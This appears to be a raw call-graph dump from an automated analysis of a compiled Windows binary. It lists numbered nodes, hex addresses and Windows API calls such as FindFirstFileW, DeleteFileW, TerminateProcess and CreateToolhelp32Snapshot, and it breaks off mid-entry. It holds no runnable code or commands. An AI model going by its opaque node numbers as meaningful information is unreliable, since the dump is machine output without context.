98259->98260 98261 ed92d5 98259->98261 98263 e92f85 _free 58 API calls 98260->98263 98264 ed92ec 98260->98264 98262 e92f85 _free 58 API calls 98261->98262 98262->98260 98263->98264 98265 e92f85 _free 58 API calls 98264->98265 98266 ed92fe 98264->98266 98265->98266 98267 eae463 98279 e7373a 98267->98279 98269 eae479 98270 eae4fa 98269->98270 98271 eae48f 98269->98271 98288 e7b020 98270->98288 98330 e75376 60 API calls 98271->98330 98275 eaf046 Mailbox 98276 eae4ce 98278 eae4ee Mailbox 98276->98278 98331 ed890a 59 API calls Mailbox 98276->98331 98278->98275 98332 eda48d 89 API calls 4 library calls 98278->98332 98280 e73746 98279->98280 98281 e73758 98279->98281 98333 e7523c 98280->98333 98282 e73787 98281->98282 98283 e7375e 98281->98283 98286 e7523c 59 API calls 98282->98286 98285 e90fe6 Mailbox 59 API calls 98283->98285 98287 e73750 98285->98287 98286->98287 98287->98269 98345 e83740 98288->98345 98291 eb30b6 98449 eda48d 89 API calls 4 library calls 98291->98449 98292 e7b07f 98292->98291 98294 eb30d4 98292->98294 98316 e7bb86 98292->98316 98327 e7b132 Mailbox _memmove 98292->98327 98450 eda48d 89 API calls 4 library calls 98294->98450 98296 eb355e 98329 e7b4dd 98296->98329 98508 eda48d 89 API calls 4 library calls 98296->98508 98297 eb318a 98297->98329 98452 eda48d 89 API calls 4 library calls 98297->98452 98299 ec730a 59 API calls 98299->98327 98304 eb3106 98304->98297 98451 e7a9de 277 API calls 98304->98451 98306 e753b0 277 API calls 98306->98327 98307 e73b31 59 API calls 98307->98327 98310 eb3418 98474 e753b0 98310->98474 98313 eb3448 98313->98329 98502 e739be 98313->98502 98448 eda48d 89 API calls 4 library calls 98316->98448 98318 eb31c3 98453 eda48d 89 API calls 4 library calls 98318->98453 98319 e73c30 68 API calls 98319->98327 98320 eb346f 98506 eda48d 89 API calls 4 library calls 98320->98506 98324 e81c9c 59 API calls 98324->98327 98325 e90fe6 59 API calls Mailbox 98325->98327 98326 e7523c 59 API calls 98326->98327 98327->98296 98327->98299 98327->98304 98327->98306 98327->98307 98327->98310 98327->98316 98327->98318 98327->98319 98327->98320 98327->98324 98327->98325 98327->98326 98327->98329 98350 e73add 98327->98350 98357 e7bc70 98327->98357 98436 e73a40 98327->98436 98447 e75190 59 API calls Mailbox 98327->98447 98454 ec6c62 59 API calls 2 library calls 98327->98454 98455 eea9c3 85 API calls Mailbox 98327->98455 98456 ec6c1e 59 API calls Mailbox 98327->98456 98457 ed5ef2 68 API calls 98327->98457 98458 e73ea3 98327->98458 98507 eda12a 59 API calls 98327->98507 98329->98278 98330->98276 98331->98278 98332->98275 98334 e7524a 98333->98334 98336 e75250 98333->98336 98334->98336 98337 e81c9c 98334->98337 98336->98287 98338 e81caf 98337->98338 98339 e81ca7 98337->98339 98338->98336 98341 e81bcc 98339->98341 98342 e81bef _memmove 98341->98342 98343 e81bdc 98341->98343 98342->98338 98343->98342 98344 e90fe6 Mailbox 59 API calls 98343->98344 98344->98342 98346 e8374f 98345->98346 98349 e8376a 98345->98349 98347 e81aa4 59 API calls 98346->98347 98348 e83757 CharUpperBuffW 98347->98348 98348->98349 98349->98292 98351 ead3cd 98350->98351 98352 e73aee 98350->98352 98353 e90fe6 Mailbox 59 API calls 98352->98353 98354 e73af5 98353->98354 98355 e73b16 98354->98355 98509 e73ba5 59 API calls Mailbox 98354->98509 98355->98327 98358 eb359f 98357->98358 98369 e7bc95 98357->98369 98602 eda48d 89 API calls 4 library calls 98358->98602 98360 e7bf3b 98360->98327 98364 e7c2b6 98364->98360 98365 e7c2c3 98364->98365 98600 e7c483 277 API calls Mailbox 98365->98600 98368 e7c2ca LockWindowUpdate DestroyWindow GetMessageW 98368->98360 98370 e7c2fc 98368->98370 98431 e7bca5 Mailbox 98369->98431 98603 e75376 60 API calls 98369->98603 98604 ec700c 277 API calls 98369->98604 98371 eb4509 TranslateMessage DispatchMessageW GetMessageW 98370->98371 98371->98371 98373 eb4539 98371->98373 98372 eb36b3 Sleep 98372->98431 98373->98360 98374 e90fe6 59 API calls Mailbox 98374->98431 98375 e7bf54 timeGetTime 98375->98431 98377 eb405d WaitForSingleObject 98378 eb407d GetExitCodeProcess CloseHandle 98377->98378 98377->98431 98386 e7c36b 98378->98386 98379 e81c9c 59 API calls 98379->98431 98380 e81207 59 API calls 98412 e7c1fa Mailbox 98380->98412 98381 e7c210 Sleep 98381->98412 98383 eb43a9 Sleep 98383->98412 98384 e76cd8 255 API calls 98384->98431 98386->98327 98387 e7c324 timeGetTime 98601 e75376 60 API calls 98387->98601 98388 e90859 timeGetTime 98388->98412 98391 eb4440 GetExitCodeProcess 98396 eb446c CloseHandle 98391->98396 98397 eb4456 WaitForSingleObject 98391->98397 98393 ef6562 110 API calls 98393->98412 98394 e76d79 109 API calls 98394->98431 98396->98412 98397->98396 98397->98431 98399 e75376 60 API calls 98399->98431 98400 eb38aa Sleep 98400->98431 98401 eb44c8 Sleep 98401->98431 98402 e81a36 59 API calls 98402->98412 98407 e73ea3 68 API calls 98407->98412 98408 e753b0 255 API calls 98408->98431 98409 e7c26d 98595 e81a36 98409->98595 98410 e7b020 255 API calls 98410->98431 98412->98380 98412->98381 98412->98386 98412->98388 98412->98391 98412->98393 98412->98400 98412->98401 98412->98402 98412->98407 98412->98431 98628 ed2baf 60 API calls 98412->98628 98629 e75376 60 API calls 98412->98629 98630 e76cd8 277 API calls 98412->98630 98671 ec70e2 59 API calls 98412->98671 98672 ed57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98412->98672 98673 ed4148 CreateToolhelp32Snapshot Process32FirstW 98412->98673 98415 eda48d 89 API calls 98415->98431 98417 e7bf25 Mailbox 98417->98360 98599 e7c460 10 API calls Mailbox 98417->98599 98419 e739be 68 API calls 98419->98431 98420 e81a36 59 API calls 98420->98431 98422 e75190 59 API calls Mailbox 98422->98431 98423 e73a40 59 API calls 98423->98431 98424 ec6cf1 59 API calls Mailbox 98424->98431 98425 eb3e13 VariantClear 98425->98431 98426 ec7aad 59 API calls 98426->98431 98427 eb3ea9 VariantClear 98427->98431 98428 eb3c57 VariantClear 98428->98431 98429 e741c4 59 API calls Mailbox 98429->98431 98430 e73ea3 68 API calls 98430->98431 98431->98372 98431->98374 98431->98375 98431->98377 98431->98379 98431->98381 98431->98383 98431->98384 98431->98386 98431->98387 98431->98394 98431->98399 98431->98408 98431->98409 98431->98410 98431->98412 98431->98415 98431->98417 98431->98419 98431->98420 98431->98422 98431->98423 98431->98424 98431->98425 98431->98426 98431->98427 98431->98428 98431->98429 98431->98430 98510 e752b0 98431->98510 98519 e79a00 98431->98519 98526 e79c80 98431->98526 98557 e7a820 98431->98557 98574 edc270 98431->98574 98581 eee60c 98431->98581 98584 eeeedb 98431->98584 98592 eee620 98431->98592 98605 ef6655 59 API calls 98431->98605 98606 eda058 59 API calls Mailbox 98431->98606 98607 ece0aa 59 API calls 98431->98607 98608 e74d37 98431->98608 98626 ec6c62 59 API calls 2 library calls 98431->98626 98627 e738ff 59 API calls 98431->98627 98631 eec355 98431->98631 98437 ead3b1 98436->98437 98440 e73a53 98436->98440 98438 ead3c1 98437->98438 99156 ec6d17 59 API calls 98437->99156 98441 e73a7d 98440->98441 98446 e73a9a Mailbox 98440->98446 99147 e73b31 98440->99147 98443 e73a83 98441->98443 98444 e73b31 59 API calls 98441->98444 98443->98446 99155 e75190 59 API calls Mailbox 98443->99155 98444->98443 98446->98327 98447->98327 98448->98291 98449->98329 98450->98329 98451->98297 98452->98329 98453->98329 98454->98327 98455->98327 98456->98327 98457->98327 99158 e73c30 98458->99158 98460 e73eb3 98461 e73f2d 98460->98461 98462 e73ebd 98460->98462 98464 e7523c 59 API calls 98461->98464 98463 e90fe6 Mailbox 59 API calls 98462->98463 98465 e73ece 98463->98465 98466 e73f1d 98464->98466 98467 e81207 59 API calls 98465->98467 98468 e73edc 98465->98468 98466->98327 98467->98468 98469 e73eeb 98468->98469 98470 e81bcc 59 API calls 98468->98470 98471 e90fe6 Mailbox 59 API calls 98469->98471 98470->98469 98472 e73ef5 98471->98472 99165 e73bc8 68 API calls 98472->99165 98475 e753cf 98474->98475 98485 e753fd Mailbox 98474->98485 98476 e90fe6 Mailbox 59 API calls 98475->98476 98476->98485 98477 e769fa 98478 e81c9c 59 API calls 98477->98478 98483 e75569 Mailbox 98478->98483 98479 e769ff 98481 eae691 98479->98481 98482 eaf165 98479->98482 98480 ec7aad 59 API calls 98480->98485 99242 eda48d 89 API calls 4 library calls 98481->99242 99246 eda48d 89 API calls 4 library calls 98482->99246 98483->98313 98485->98477 98485->98479 98485->98480 98485->98481 98485->98483 98486 e90fe6 59 API calls Mailbox 98485->98486 98489 e81c9c 59 API calls 98485->98489 98492 eaea9a 98485->98492 98493 e81207 59 API calls 98485->98493 98496 eaeb67 98485->98496 98497 e92f70 67 API calls __cinit 98485->98497 98499 eaef28 98485->98499 98501 e75a1a 98485->98501 99166 e77e50 98485->99166 99225 e76e30 98485->99225 98486->98485 98489->98485 98490 eae6a0 98490->98313 98495 e81c9c 59 API calls 98492->98495 98493->98485 98495->98483 98496->98483 99243 ec7aad 59 API calls 98496->99243 98497->98485 99244 eda48d 89 API calls 4 library calls 98499->99244 99245 eda48d 89 API calls 4 library calls 98501->99245 98503 e739c9 98502->98503 98504 e739f0 98503->98504 98505 e73ea3 68 API calls 98503->98505 98504->98320 98505->98504 98506->98329 98507->98327 98508->98329 98509->98355 98511 e752c6 98510->98511 98512 e75313 98510->98512 98511->98512 98513 e752d3 PeekMessageW 98511->98513 98514 e752ec 98512->98514 98516 eadf68 TranslateAcceleratorW 98512->98516 98517 e75352 TranslateMessage DispatchMessageW 98512->98517 98518 e7533e PeekMessageW 98512->98518 98683 e7359e 98512->98683 98513->98512 98513->98514 98514->98431 98516->98512 98516->98518 98517->98518 98518->98512 98518->98514 98520 e79a1d 98519->98520 98522 e79a31 98519->98522 98688 e794e0 98520->98688 98722 eda48d 89 API calls 4 library calls 98522->98722 98523 e79a28 98523->98431 98525 eb2478 98525->98525 98527 e79cb5 98526->98527 98528 eb247d 98527->98528 98531 e79d1f 98527->98531 98542 e79d79 98527->98542 98529 e753b0 277 API calls 98528->98529 98530 eb2492 98529->98530 98551 e79f50 Mailbox 98530->98551 98739 eda48d 89 API calls 4 library calls 98530->98739 98534 e81207 59 API calls 98531->98534 98531->98542 98532 e81207 59 API calls 98532->98542 98535 eb24d8 98534->98535 98538 e92f70 __cinit 67 API calls 98535->98538 98536 e7a058 98536->98431 98537 e92f70 __cinit 67 API calls 98537->98542 98538->98542 98539 eb24fa 98539->98431 98540 e739be 68 API calls 98540->98551 98541 e753b0 277 API calls 98541->98551 98542->98532 98542->98537 98542->98539 98545 e79f3a 98542->98545 98542->98551 98544 e7a775 98744 eda48d 89 API calls 4 library calls 98544->98744 98545->98551 98740 eda48d 89 API calls 4 library calls 98545->98740 98549 eb27f9 98549->98431 98550 e74230 59 API calls 98550->98551 98551->98536 98551->98540 98551->98541 98551->98544 98551->98550 98554 e81bcc 59 API calls 98551->98554 98555 eda48d 89 API calls 98551->98555 98741 ec7aad 59 API calls 98551->98741 98742 eeccac 277 API calls 98551->98742 98743 eebc26 277 API calls Mailbox 98551->98743 98745 e75190 59 API calls Mailbox 98551->98745 98746 ee9ab0 277 API calls Mailbox 98551->98746 98554->98551 98555->98551 98558 eb2d51 98557->98558 98561 e7a84c 98557->98561 98748 eda48d 89 API calls 4 library calls 98558->98748 98560 eb2d62 98560->98431 98562 eb2d6a 98561->98562 98568 e7a888 _memmove 98561->98568 98749 eda48d 89 API calls 4 library calls 98562->98749 98565 e90fe6 59 API calls Mailbox 98565->98568 98566 eb2dae 98750 e7a9de 277 API calls 98566->98750 98567 e753b0 277 API calls 98567->98568 98568->98565 98568->98566 98568->98567 98570 e7a975 98568->98570 98571 eb2dc8 98568->98571 98573 e7a962 98568->98573 98570->98431 98571->98570 98751 eda48d 89 API calls 4 library calls 98571->98751 98573->98570 98747 eea9c3 85 API calls Mailbox 98573->98747 98575 e74d37 84 API calls 98574->98575 98576 edc286 98575->98576 98752 ed4005 98576->98752 98578 edc28e 98579 edc292 GetLastError 98578->98579 98580 edc2a7 98578->98580 98579->98580 98580->98431 98881 eed1c6 98581->98881 98583 eee61c 98583->98431 98585 eeeef7 98584->98585 98586 eeef1e 98584->98586 98585->98431 98587 eeef40 98586->98587 99027 e7502b 59 API calls 98586->99027 98587->98585 98590 eeef84 98587->98590 99028 e7502b 59 API calls 98587->99028 98994 ed6818 98590->98994 98593 eed1c6 130 API calls 98592->98593 98594 eee630 98593->98594 98594->98431 98596 e81a45 __NMSG_WRITE _memmove 98595->98596 98597 e90fe6 Mailbox 59 API calls 98596->98597 98598 e81a83 98597->98598 98598->98417 98599->98364 98600->98368 98601->98431 98602->98369 98603->98369 98604->98369 98605->98431 98606->98431 98607->98431 98609 e74d51 98608->98609 98610 e74d4b 98608->98610 98611 eadb28 __i64tow 98609->98611 98612 e74d99 98609->98612 98614 e74d57 __itow 98609->98614 98617 eada2f 98609->98617 98610->98431 99069 e938c8 83 API calls 3 library calls 98612->99069 98616 e90fe6 Mailbox 59 API calls 98614->98616 98618 e74d71 98616->98618 98619 e90fe6 Mailbox 59 API calls 98617->98619 98624 eadaa7 Mailbox _wcscpy 98617->98624 98618->98610 98620 e81a36 59 API calls 98618->98620 98621 eada74 98619->98621 98620->98610 98622 e90fe6 Mailbox 59 API calls 98621->98622 98623 eada9a 98622->98623 98623->98624 98625 e81a36 59 API calls 98623->98625 99070 e938c8 83 API calls 3 library calls 98624->99070 98625->98624 98626->98431 98627->98431 98628->98412 98629->98412 98630->98412 98632 eec39a 98631->98632 98633 eec380 98631->98633 99071 eea8fd 98632->99071 99098 eda48d 89 API calls 4 library calls 98633->99098 98637 e753b0 276 API calls 98638 eec406 98637->98638 98639 eec498 98638->98639 98642 eec447 98638->98642 98654 eec392 Mailbox 98638->98654 98640 eec4ee 98639->98640 98641 eec49e 98639->98641 98643 e74d37 84 API calls 98640->98643 98640->98654 99099 ed7ed5 59 API calls 98641->99099 98647 ed789a 59 API calls 98642->98647 98644 eec500 98643->98644 98648 e81aa4 59 API calls 98644->98648 98646 eec4c1 99100 e835b9 59 API calls Mailbox 98646->99100 98650 eec477 98647->98650 98651 eec524 CharUpperBuffW 98648->98651 98653 ec6ebc 276 API calls 98650->98653 98655 eec53e 98651->98655 98652 eec4c9 Mailbox 98658 e7b020 276 API calls 98652->98658 98653->98654 98654->98431 98656 eec545 98655->98656 98657 eec591 98655->98657 99078 ed789a 98656->99078 98659 e74d37 84 API calls 98657->98659 98658->98654 98660 eec599 98659->98660 99101 e75376 60 API calls 98660->99101 98665 eec5a3 98665->98654 98666 e74d37 84 API calls 98665->98666 98667 eec5be 98666->98667 99102 e835b9 59 API calls Mailbox 98667->99102 98669 eec5ce 98670 e7b020 276 API calls 98669->98670 98670->98654 98671->98412 98672->98412 99137 ed4ce2 98673->99137 98675 ed418e Mailbox 98676 ed4195 Process32NextW 98675->98676 98677 ed4244 FindCloseChangeNotification 98675->98677 98678 e81207 59 API calls 98675->98678 98679 e81a36 59 API calls 98675->98679 98680 e90119 59 API calls 98675->98680 99143 e817e0 59 API calls Mailbox 98675->99143 99144 e8151f 61 API calls 98675->99144 98676->98675 98676->98677 98677->98412 98678->98675 98679->98675 98680->98675 98684 e735e2 98683->98684 98687 e735b0 98683->98687 98684->98512 98685 e735d5 IsDialogMessageW 98685->98684 98685->98687 98686 ead273 GetClassLongW 98686->98685 98686->98687 98687->98684 98687->98685 98687->98686 98689 e753b0 277 API calls 98688->98689 98690 e7951f 98689->98690 98691 e79527 _memmove 98690->98691 98692 eb2001 98690->98692 98696 e79583 98691->98696 98697 e79944 98691->98697 98700 e90fe6 59 API calls Mailbox 98691->98700 98705 eb22c0 98691->98705 98706 e796cf 98691->98706 98720 e79741 98691->98720 98731 e75190 59 API calls Mailbox 98692->98731 98695 eb22de 98695->98695 98696->98523 98699 e90fe6 Mailbox 59 API calls 98697->98699 98698 e7986a 98701 e7987f 98698->98701 98702 eb22b1 98698->98702 98713 e796e3 _memmove 98699->98713 98700->98691 98703 e90fe6 Mailbox 59 API calls 98701->98703 98736 eea983 59 API calls 98702->98736 98712 e7977d 98703->98712 98737 eda48d 89 API calls 4 library calls 98705->98737 98706->98697 98708 e796dc 98706->98708 98707 e90fe6 Mailbox 59 API calls 98711 e7970e 98707->98711 98710 e90fe6 Mailbox 59 API calls 98708->98710 98709 eb22a0 98735 eda48d 89 API calls 4 library calls 98709->98735 98710->98713 98711->98720 98723 e7cca0 98711->98723 98712->98523 98713->98707 98713->98711 98713->98720 98717 eb2278 98734 eda48d 89 API calls 4 library calls 98717->98734 98719 eb2253 98733 eda48d 89 API calls 4 library calls 98719->98733 98720->98698 98720->98709 98720->98712 98720->98717 98720->98719 98732 e78180 277 API calls 98720->98732 98722->98525 98724 e7cd02 98723->98724 98725 e7ccda 98723->98725 98727 eb4971 98724->98727 98728 e753b0 277 API calls 98724->98728 98729 e7cce0 98724->98729 98726 e79c80 277 API calls 98725->98726 98725->98729 98726->98729 98727->98729 98738 eda48d 89 API calls 4 library calls 98727->98738 98728->98727 98729->98720 98729->98729 98731->98697 98732->98720 98733->98712 98734->98712 98735->98712 98736->98705 98737->98695 98738->98729 98739->98551 98740->98551 98741->98551 98742->98551 98743->98551 98744->98549 98745->98551 98746->98551 98747->98570 98748->98560 98749->98570 98750->98571 98751->98570 98753 e81207 59 API calls 98752->98753 98754 ed4024 98753->98754 98755 e81207 59 API calls 98754->98755 98756 ed402d 98755->98756 98757 e81207 59 API calls 98756->98757 98758 ed4036 98757->98758 98777 e90284 98758->98777 98763 ed405c 98789 e90119 98763->98789 98766 ed4070 FindFirstFileW 98767 ed40fc FindClose 98766->98767 98768 ed408f 98766->98768 98773 ed4107 Mailbox 98767->98773 98768->98767 98771 ed4093 98768->98771 98769 ed40d7 FindNextFileW 98769->98768 98769->98771 98770 e81c9c 59 API calls 98770->98771 98771->98768 98771->98769 98771->98770 98774 e81900 59 API calls 98771->98774 98847 e817e0 59 API calls Mailbox 98771->98847 98773->98578 98775 ed40c8 DeleteFileW 98774->98775 98775->98769 98776 ed40f3 FindClose 98775->98776 98776->98773 98848 ea1b70 98777->98848 98780 e902cd 98854 e819e1 98780->98854 98781 e902b0 98782 e81821 59 API calls 98781->98782 98784 e902bc 98782->98784 98850 e8133d 98784->98850 98787 ed4fec GetFileAttributesW 98788 ed404a 98787->98788 98788->98763 98840 e81900 98788->98840 98790 e81207 59 API calls 98789->98790 98791 e9012f 98790->98791 98792 e81207 59 API calls 98791->98792 98793 e90137 98792->98793 98794 e81207 59 API calls 98793->98794 98795 e9013f 98794->98795 98796 e81207 59 API calls 98795->98796 98797 e90147 98796->98797 98798 ec627d 98797->98798 98799 e9017b 98797->98799 98800 e81c9c 59 API calls 98798->98800 98801 e81462 59 API calls 98799->98801 98802 ec6286 98800->98802 98803 e90189 98801->98803 98804 e819e1 59 API calls 98802->98804 98805 e81981 59 API calls 98803->98805 98807 e901be 98804->98807 98806 e90193 98805->98806 98806->98807 98809 e81462 59 API calls 98806->98809 98808 e901fe 98807->98808 98811 e901dd 98807->98811 98821 ec62a6 98807->98821 98858 e81462 98808->98858 98812 e901b4 98809->98812 98871 e81609 98811->98871 98816 e81981 59 API calls 98812->98816 98814 e9020f 98819 e90221 98814->98819 98822 e81c9c 59 API calls 98814->98822 98815 ec6376 98817 e81821 59 API calls 98815->98817 98816->98807 98835 ec6333 98817->98835 98820 e90231 98819->98820 98823 e81c9c 59 API calls 98819->98823 98825 e90238 98820->98825 98827 e81c9c 59 API calls 98820->98827 98821->98815 98824 ec635f 98821->98824 98834 ec62dd 98821->98834 98822->98819 98823->98820 98824->98815 98830 ec634a 98824->98830 98828 e81c9c 59 API calls 98825->98828 98837 e9023f Mailbox 98825->98837 98826 e81462 59 API calls 98826->98808 98827->98825 98828->98837 98829 e81609 59 API calls 98829->98835 98833 e81821 59 API calls 98830->98833 98831 ec633b 98832 e81821 59 API calls 98831->98832 98832->98835 98833->98835 98834->98831 98838 ec6326 98834->98838 98835->98808 98835->98829 98874 e8153b 59 API calls 2 library calls 98835->98874 98837->98766 98839 e81821 59 API calls 98838->98839 98839->98835 98841 e81914 98840->98841 98842 ebf534 98840->98842 98876 e818a5 98841->98876 98843 e81c7e 59 API calls 98842->98843 98846 ebf53f __NMSG_WRITE _memmove 98843->98846 98845 e8191f 98845->98763 98847->98771 98849 e90291 GetFullPathNameW 98848->98849 98849->98780 98849->98781 98851 e8134b 98850->98851 98852 e81981 59 API calls 98851->98852 98853 e8135b 98852->98853 98853->98787 98855 e819fb 98854->98855 98857 e819ee 98854->98857 98856 e90fe6 Mailbox 59 API calls 98855->98856 98856->98857 98857->98784 98859 e814ce 98858->98859 98860 e81471 98858->98860 98861 e81981 59 API calls 98859->98861 98860->98859 98862 e8147c 98860->98862 98863 e8149f _memmove 98861->98863 98864 ebf1de 98862->98864 98865 e81497 98862->98865 98863->98814 98867 e81c7e 59 API calls 98864->98867 98875 e81b7c 59 API calls Mailbox 98865->98875 98868 ebf1e8 98867->98868 98869 e90fe6 Mailbox 59 API calls 98868->98869 98870 ebf208 98869->98870 98872 e81aa4 59 API calls 98871->98872 98873 e81614 98872->98873 98873->98808 98873->98826 98874->98835 98875->98863 98877 e818b4 __NMSG_WRITE 98876->98877 98878 e81c7e 59 API calls 98877->98878 98879 e818c5 _memmove 98877->98879 98880 ebf4f1 _memmove 98878->98880 98879->98845 98882 e74d37 84 API calls 98881->98882 98883 eed203 98882->98883 98888 eed24a Mailbox 98883->98888 98919 eede8e 98883->98919 98885 eed617 98969 eedfb1 92 API calls Mailbox 98885->98969 98888->98583 98889 eed626 98890 eed4b0 98889->98890 98892 eed632 98889->98892 98932 eed057 98890->98932 98891 e74d37 84 API calls 98897 eed29b Mailbox 98891->98897 98892->98888 98897->98888 98897->98891 98906 eed4a2 98897->98906 98952 edfc0d 59 API calls 2 library calls 98897->98952 98953 eed6c8 61 API calls 2 library calls 98897->98953 98898 eed4e9 98947 e90e38 98898->98947 98901 eed51c 98955 e747be 98901->98955 98902 eed503 98954 eda48d 89 API calls 4 library calls 98902->98954 98905 eed50e GetCurrentProcess TerminateProcess 98905->98901 98906->98885 98906->98890 98911 eed68d 98911->98888 98915 eed6a1 FreeLibrary 98911->98915 98912 eed554 98967 eedd32 107 API calls _free 98912->98967 98915->98888 98917 eed565 98917->98911 98918 e7523c 59 API calls 98917->98918 98968 e74230 59 API calls Mailbox 98917->98968 98970 eedd32 107 API calls _free 98917->98970 98918->98917 98920 e81aa4 59 API calls 98919->98920 98921 eedea9 CharLowerBuffW 98920->98921 98971 ecf903 98921->98971 98925 e81207 59 API calls 98927 eedee2 98925->98927 98926 eedf41 Mailbox 98926->98897 98928 e81462 59 API calls 98927->98928 98929 eedef9 98928->98929 98930 e81981 59 API calls 98929->98930 98931 eedf05 Mailbox 98930->98931 98931->98926 98978 eed6c8 61 API calls 2 library calls 98931->98978 98933 eed072 98932->98933 98934 eed0c7 98932->98934 98935 e90fe6 Mailbox 59 API calls 98933->98935 98938 eee139 98934->98938 98937 eed094 98935->98937 98936 e90fe6 Mailbox 59 API calls 98936->98937 98937->98934 98937->98936 98939 eee362 Mailbox 98938->98939 98946 eee15c _strcat _wcscpy __NMSG_WRITE 98938->98946 98939->98898 98940 e7502b 59 API calls 98940->98946 98941 e750d5 59 API calls 98941->98946 98942 e75087 59 API calls 98942->98946 98943 e74d37 84 API calls 98943->98946 98944 e9593c 58 API calls __crtLCMapStringA_stat 98944->98946 98946->98939 98946->98940 98946->98941 98946->98942 98946->98943 98946->98944 98981 ed5e42 61 API calls 2 library calls 98946->98981 98948 e90e4d 98947->98948 98949 e90ee5 LoadLibraryExW 98948->98949 98950 e90eb3 98948->98950 98951 e90ed3 FindCloseChangeNotification 98948->98951 98949->98950 98950->98901 98950->98902 98951->98950 98952->98897 98953->98897 98954->98905 98956 e747c6 98955->98956 98957 e90fe6 Mailbox 59 API calls 98956->98957 98958 e747d4 98957->98958 98959 e747e0 98958->98959 98982 e746ec 98958->98982 98961 e74540 98959->98961 98985 e74650 98961->98985 98963 e7454f 98964 e90fe6 Mailbox 59 API calls 98963->98964 98965 e745eb 98963->98965 98964->98965 98965->98917 98966 e74230 59 API calls Mailbox 98965->98966 98966->98912 98967->98917 98968->98917 98969->98889 98970->98917 98972 ecf92e __NMSG_WRITE 98971->98972 98975 ecf963 98972->98975 98976 ecfa14 98972->98976 98977 ecf96d 98972->98977 98975->98977 98979 e814db 61 API calls 98975->98979 98976->98977 98980 e814db 61 API calls 98976->98980 98977->98925 98977->98931 98978->98926 98979->98975 98980->98976 98981->98946 98983 e90fe6 Mailbox 59 API calls 98982->98983 98984 e746f9 98983->98984 98984->98959 98986 e74659 Mailbox 98985->98986 98987 ead6ec 98986->98987 98992 e74663 98986->98992 98988 e90fe6 Mailbox 59 API calls 98987->98988 98990 ead6f8 98988->98990 98989 e7466a 98989->98963 98992->98989 98993 e75190 59 API calls Mailbox 98992->98993 98993->98992 99029 ed6735 98994->99029 98997 ed6899 99045 ed6a73 89 API calls 2 library calls 98997->99045 98998 ed68b1 98999 ed6921 98998->98999 99003 ed6917 98998->99003 99008 ed68ca 98998->99008 99001 ed699f 98999->99001 99002 ed6951 98999->99002 99020 ed683d _memmove 98999->99020 99004 ed6a3a 99001->99004 99005 ed69a6 99001->99005 99006 ed6956 99002->99006 99007 ed6971 99002->99007 99003->98999 99009 ed68fe 99003->99009 99004->99020 99054 e750d5 59 API calls 99004->99054 99010 ed6a1c 99005->99010 99011 ed69a9 99005->99011 99006->99020 99049 e75087 59 API calls 99006->99049 99007->99020 99050 e75087 59 API calls 99007->99050 99046 ed8cd0 61 API calls 99008->99046 99036 ed7c7f 99009->99036 99010->99020 99053 e750d5 59 API calls 99010->99053 99014 ed69ad 99011->99014 99015 ed69e5 99011->99015 99014->99020 99051 e750d5 59 API calls 99014->99051 99015->99020 99052 e750d5 59 API calls 99015->99052 99020->98585 99022 ed68d2 99047 ed8cd0 61 API calls 99022->99047 99025 ed68e9 _memmove 99048 ed8cd0 61 API calls 99025->99048 99027->98587 99028->98590 99030 ed6785 99029->99030 99035 ed6746 99029->99035 99065 e7502b 59 API calls 99030->99065 99032 e74d37 84 API calls 99032->99035 99033 ed6783 99033->98997 99033->98998 99033->99020 99035->99032 99035->99033 99055 e9312d 99035->99055 99037 ed7c8a 99036->99037 99038 e90fe6 Mailbox 59 API calls 99037->99038 99039 ed7c91 99038->99039 99040 ed7c9d 99039->99040 99041 ed7cbe 99039->99041 99043 e90fe6 Mailbox 59 API calls 99040->99043 99042 e90fe6 Mailbox 59 API calls 99041->99042 99044 ed7ca6 _memset 99042->99044 99043->99044 99044->99020 99045->99020 99046->99022 99047->99025 99048->99009 99049->99020 99050->99020 99051->99020 99052->99020 99053->99020 99054->99020 99056 e93139 99055->99056 99057 e931ae 99055->99057 99064 e9315e 99056->99064 99066 e98d58 58 API calls __getptd_noexit 99056->99066 99068 e931c0 60 API calls 3 library calls 99057->99068 99060 e931bb 99060->99035 99061 e93145 99067 e98fe6 9 API calls __mbstowcs_l_helper 99061->99067 99063 e93150 99063->99035 99064->99035 99065->99033 99066->99061 99067->99063 99068->99060 99069->98614 99070->98611 99072 eea918 99071->99072 99076 eea970 99071->99076 99073 e90fe6 Mailbox 59 API calls 99072->99073 99077 eea93a 99073->99077 99074 e90fe6 Mailbox 59 API calls 99074->99077 99076->98637 99077->99074 99077->99076 99103 ec715b 59 API calls Mailbox 99077->99103 99079 ed78ac 99078->99079 99080 ed78e3 99078->99080 99079->99080 99081 e90fe6 Mailbox 59 API calls 99079->99081 99082 ec6ebc 99080->99082 99081->99080 99083 ec6f06 99082->99083 99087 ec6f1c Mailbox 99082->99087 99084 e81a36 59 API calls 99083->99084 99084->99087 99085 ec6f5a 99089 e7a820 277 API calls 99085->99089 99086 ec6f47 99088 eec355 277 API calls 99086->99088 99087->99085 99087->99086 99094 ec6f53 99088->99094 99092 ec6f91 99089->99092 99091 ec7002 99091->98654 99093 ec6fdc 99092->99093 99092->99094 99096 ec6fc1 99092->99096 99093->99094 99110 eda48d 89 API calls 4 library calls 99093->99110 99111 ec6cf1 59 API calls Mailbox 99094->99111 99104 ec706d 99096->99104 99098->98654 99099->98646 99100->98652 99101->98665 99102->98669 99103->99077 99105 ec7085 99104->99105 99112 ee495b 99105->99112 99121 ed413a 99105->99121 99124 eef1b2 99105->99124 99106 ec70d9 99106->99094 99110->99094 99111->99091 99113 e90fe6 Mailbox 59 API calls 99112->99113 99114 ee496c 99113->99114 99129 e8433f 99114->99129 99117 e74d37 84 API calls 99118 ee498d GetEnvironmentVariableW 99117->99118 99132 ed7a51 59 API calls Mailbox 99118->99132 99120 ee49aa 99120->99106 99133 ed494a GetFileAttributesW 99121->99133 99125 e74d37 84 API calls 99124->99125 99126 eef1cf 99125->99126 99127 ed4148 66 API calls 99126->99127 99128 eef1de 99127->99128 99128->99106 99130 e90fe6 Mailbox 59 API calls 99129->99130 99131 e84351 99130->99131 99131->99117 99132->99120 99134 ed413f 99133->99134 99135 ed4965 FindFirstFileW 99133->99135 99134->99106 99135->99134 99136 ed497a FindClose 99135->99136 99136->99134 99138 ed4d09 99137->99138 99142 ed4cf0 99137->99142 99146 e937c3 59 API calls __wcstoi64 99138->99146 99141 ed4d0f 99141->98675 99142->99138 99142->99141 99145 e9385c GetStringTypeW _iswctype 99142->99145 99143->98675 99144->98675 99145->99142 99146->99141 99148 e73b3f 99147->99148 99154 e73b67 99147->99154 99149 e73b4d 99148->99149 99150 e73b31 59 